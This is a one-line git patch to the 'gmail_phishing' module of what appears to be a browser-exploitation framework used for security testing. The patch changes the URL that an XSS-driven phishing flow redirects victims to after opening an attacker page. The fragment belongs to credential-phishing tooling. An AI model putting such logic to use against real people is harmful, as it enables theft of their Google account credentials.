From 2d19294540c346be32087125b17b8b5dafa0bf15 Mon Sep 17 00:00:00 2001 From: Parag Jyoti Pal Date: Thu, 11 Feb 2021 12:10:49 +0530 Subject: [PATCH] Fixed Gmail Phishing by updating https://accounts.google.com/ServiceLogin to https://accounts.google.com/ --- modules/social_engineering/gmail_phishing/command.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/social_engineering/gmail_phishing/command.js b/modules/social_engineering/gmail_phishing/command.js index 75455a681..bb0439713 100644 --- a/modules/social_engineering/gmail_phishing/command.js +++ b/modules/social_engineering/gmail_phishing/command.js @@ -34,7 +34,7 @@ function redirect(){ window.open(theXssUrl); window.focus(); } - window.location = "https://accounts.google.com/ServiceLoginAuth"; + window.location = "https://accounts.google.com/"; } function displayPhishingSite(){